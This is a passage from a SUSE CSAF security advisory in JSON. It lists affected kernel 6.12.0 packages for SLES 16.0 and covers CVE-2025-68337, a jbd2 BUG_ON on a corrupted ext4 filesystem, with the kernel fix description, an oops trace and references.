"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68325"
},
{
"cve": "CVE-2025-68337",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68337"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\njbd2: avoid bug_on in jbd2_journal_get_create_access() when file system corrupted\n\nThere\u0027s issue when file system corrupted:\n------------[ cut here ]------------\nkernel BUG at fs/jbd2/transaction.c:1289!\nOops: invalid opcode: 0000 [#1] SMP KASAN PTI\nCPU: 5 UID: 0 PID: 2031 Comm: mkdir Not tainted 6.18.0-rc1-next\nRIP: 0010:jbd2_journal_get_create_access+0x3b6/0x4d0\nRSP: 0018:ffff888117aafa30 EFLAGS: 00010202\nRAX: 0000000000000000 RBX: ffff88811a86b000 RCX: ffffffff89a63534\nRDX: 1ffff110200ec602 RSI: 0000000000000004 RDI: ffff888100763010\nRBP: ffff888100763000 R08: 0000000000000001 R09: ffff888100763028\nR10: 0000000000000003 R11: 0000000000000000 R12: 0000000000000000\nR13: ffff88812c432000 R14: ffff88812c608000 R15: ffff888120bfc000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f91d6970c99 CR3: 00000001159c4000 CR4: 00000000000006f0\nCall Trace:\n \u003cTASK\u003e\n __ext4_journal_get_create_access+0x42/0x170\n ext4_getblk+0x319/0x6f0\n ext4_bread+0x11/0x100\n ext4_append+0x1e6/0x4a0\n ext4_init_new_dir+0x145/0x1d0\n ext4_mkdir+0x326/0x920\n vfs_mkdir+0x45c/0x740\n do_mkdirat+0x234/0x2f0\n __x64_sys_mkdir+0xd6/0x120\n do_syscall_64+0x5f/0xfa0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nThe above issue occurs with us in errors=continue mode when accompanied by\nstorage failures. There have been many inconsistencies in the file system\ndata.\nIn the case of file system data inconsistency, for example, if the block\nbitmap of a referenced block is not set, it can lead to the situation where\na block being committed is allocated and used again. As a result, the\nfollowing condition will not be satisfied then trigger BUG_ON. Of course,\nit is entirely possible to construct a problematic image that can trigger\nthis BUG_ON through specific operations. In fact, I have constructed such\nan image and easily reproduced this issue.\nTherefore, J_ASSERT() holds true only under ideal conditions, but it may\nnot necessarily be satisfied in exceptional scenarios. Using J_ASSERT()\ndirectly in abnormal situations would cause the system to crash, which is\nclearly not what we want. So here we directly trigger a JBD abort instead\nof immediately invoking BUG_ON.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68337",
"url": "https://www.suse.com/security/cve/CVE-2025-68337"
},
{
"category": "external",
"summary": "SUSE Bug 1255482 for CVE-2025-68337",
"url": "https://bugzilla.suse.com/1255482"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
